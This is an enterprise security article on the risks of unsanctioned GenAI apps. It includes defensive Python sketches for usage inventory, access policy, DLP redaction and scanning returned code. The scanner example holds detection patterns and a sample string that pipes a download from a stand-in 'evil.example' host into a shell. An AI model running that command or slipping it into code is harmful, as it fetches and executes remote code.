Adopting unsanctioned GenAI applications can expose an organization to a broad range of cybersecurity issues, from data leakage to malware. Companies often don't know who is using which apps, what sensitive information is going into them, or what happens to that data once it's there. And because not all applications are built to enterprise security standards, some can serve malicious links (hyperlinks that lead to a website or file containing harmful software) or act as entry points for attackers to infiltrate a company's network, giving them access to its systems and data. The fallout can include regulatory compliance violations, sensitive data exposure, IP theft, operational disruption and financial losses. While these apps offer enormous productivity potential, adopting them without proper safeguards carries serious risks.
Anand Oswal, SVP & GM of Network Security at Palo Alto Networks, weighs in on this important subject. Consider a few scenarios:
• Marketing teams using an unsanctioned AI application to generate eye-catching image and video content. What happens if the team loads sensitive information into the app and the details of your confidential product launch leak? Not the kind of "viral" you were looking for.
• Project managers using AI-powered note-taking apps to transcribe meetings and provide valuable summaries. But what happens when the notes captured include a confidential discussion about this quarter's financial results ahead of the earnings announcement?
• Developers using copilots and code optimization services to build products faster. But what if optimized code returned from a compromised application includes malicious scripts?
These are just a few ways that well-intentioned use of GenAI results in an unintentional increase in risk. However, blocking these technologies may limit your organization's ability to gain a competitive edge. The key is to empower your employees to use these applications securely, thereby leveraging their potential for innovation and productivity. Here are a few considerations:
Visibility: You can't protect what you don't know about. One of the biggest challenges IT teams face with unsanctioned apps is that security incidents are difficult to respond to promptly, increasing the potential for breaches. Every enterprise must monitor the use of third-party GenAI apps and understand the specific risks associated with each tool. Once they know which tools are in use, IT teams also need visibility into what data flows in and out of corporate systems. That visibility helps ensure a security breach can be detected and rectified quickly.
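As a minimal sketch of what this inventory step might look like, the snippet below counts requests and outbound bytes per user and GenAI domain from simplified proxy log lines. The domain list and log format are illustrative assumptions; a real deployment would rely on a vendor-maintained application catalog and actual proxy or firewall logs.

```python
from collections import Counter

# Hypothetical set of known GenAI domains; real products ship a
# continuously updated application catalog instead of a hard-coded list.
GENAI_DOMAINS = {"chat.openai.com", "gemini.google.com", "claude.ai"}

def inventory_genai_usage(proxy_log_lines):
    """Tally GenAI requests and outbound bytes from simplified proxy
    log lines of the form '<user> <domain> <bytes_sent>'."""
    usage = Counter()      # request count per (user, domain)
    bytes_out = Counter()  # bytes sent per (user, domain)
    for line in proxy_log_lines:
        user, domain, sent = line.split()
        if domain in GENAI_DOMAINS:
            usage[(user, domain)] += 1
            bytes_out[(user, domain)] += int(sent)
    return usage, bytes_out

logs = [
    "alice chat.openai.com 2048",
    "bob claude.ai 512",
    "alice chat.openai.com 4096",
    "carol intranet.example.com 128",
]
usage, bytes_out = inventory_genai_usage(logs)
print(usage[("alice", "chat.openai.com")])      # 2 requests
print(bytes_out[("alice", "chat.openai.com")])  # 6144 bytes sent
```

Even a crude tally like this surfaces the two questions the article raises: who is using which apps, and how much data is leaving through them.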
Control: IT teams need to be able to make an informed decision on whether to block, allow, or limit access to third-party GenAI apps, either on a per-application basis or by leveraging risk-based or categorical controls. For example, you might block access to code optimization tools for employees in general while allowing developers to use the specific third-party optimization tool that your information security team has assessed and sanctioned for internal use.
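A hedged sketch of such a decision follows, assuming a hypothetical policy table keyed by application and category. The app names, categories, and defaults are illustrative, not a real product's configuration; they simply mirror the "block the category, allow the sanctioned exception" example above.

```python
# Hypothetical policy table; all names here are illustrative assumptions.
APP_POLICIES = {
    "sanctioned-code-optimizer": {"category": "code-optimization",
                                  "allowed_roles": {"developer"}},
    "viral-notes-app": {"category": "note-taking", "allowed_roles": set()},
}
# Default action per application category (categorical / risk-based control).
CATEGORY_DEFAULTS = {"code-optimization": "block", "note-taking": "limit"}

def access_decision(app, role):
    policy = APP_POLICIES.get(app)
    if policy is None:
        return "block"                      # default-deny unknown apps
    if role in policy["allowed_roles"]:
        return "allow"                      # sanctioned exception by role
    return CATEGORY_DEFAULTS.get(policy["category"], "block")

print(access_decision("sanctioned-code-optimizer", "developer"))  # allow
print(access_decision("sanctioned-code-optimizer", "marketing"))  # block
print(access_decision("shadow-ai-tool", "developer"))             # block
```

The design choice worth noting is default-deny: an app absent from the table is blocked until the security team has assessed it.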
Data Security: Ensuring the security of your data is paramount. Are your teams sharing sensitive data with the apps?
IT teams need to block sensitive data from leaking to protect your data against misuse and theft. This is especially important if your company is regulated or subject to data sovereignty laws. In practice, this means monitoring the data being sent to GenAI apps and then leveraging technical controls to ensure that sensitive or protected data, such as personally identifiable information or intellectual property, isn't sent to these applications.
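In practice, this monitoring often takes the shape of a data loss prevention (DLP) check on outbound prompts. The sketch below uses a few illustrative regex detectors to scan and redact a prompt before it leaves the network; production DLP engines use far richer techniques (exact-data matching, document fingerprinting, ML classifiers), so treat this as a toy model of the idea.

```python
import re

# Illustrative detectors only; the pattern names and sample data are
# assumptions for this sketch, not a real DLP rule set.
PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d{4}[ -]?){3}\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def scan_prompt(text):
    """Return the set of sensitive-data types found in an outbound prompt."""
    return {name for name, pat in PATTERNS.items() if pat.search(text)}

def redact_prompt(text):
    """Replace detected sensitive values before the prompt leaves the network."""
    for name, pat in PATTERNS.items():
        text = pat.sub(f"[REDACTED-{name.upper()}]", text)
    return text

prompt = "Summarize the record for jane.doe@example.com, SSN 123-45-6789."
print(scan_prompt(prompt))   # types detected: email and ssn
print(redact_prompt(prompt))
```

Whether a hit should block the request outright or merely redact and log it is a policy decision, and regulated organizations will usually want the stricter option.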
Threat prevention: Exploits and vulnerabilities can lurk beneath the GenAI tools your teams use. Given the incredibly fast pace at which many of these tools have been developed and brought to market, you often don't know whether the underlying model was built on compromised components, trained on incorrect or malicious data, or is subject to a broad range of AI-specific vulnerabilities. A recommended best practice is to proactively monitor and control the data flowing from these applications into your organization, watching for malicious or suspicious activity.
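One hedged illustration of inspecting that inbound flow: flagging code returned by a GenAI tool when it matches simple indicators of suspicious behavior. The patterns below are illustrative assumptions for this sketch; real threat prevention relies on sandboxed execution and signature- or ML-based engines rather than a handful of regexes.

```python
import re

# Toy indicators of suspicious content in returned code; a real engine
# would use maintained signatures and behavioral analysis instead.
SUSPICIOUS = [
    re.compile(r"eval\s*\(\s*base64"),          # obfuscated dynamic execution
    re.compile(r"curl\s+[^|]*\|\s*(?:ba)?sh"),  # pipe-to-shell download
    re.compile(r"<script\b", re.IGNORECASE),    # injected script tag
]

def flag_response(code):
    """Return True if returned code matches any suspicious indicator."""
    return any(pat.search(code) for pat in SUSPICIOUS)

clean = "def add(a, b):\n    return a + b\n"
tainted = "import os\nos.system('curl http://evil.example/x.sh | sh')\n"
print(flag_response(clean))    # False
print(flag_response(tainted))  # True
```

Flagged responses can then be quarantined for review rather than handed straight back to the developer who requested them.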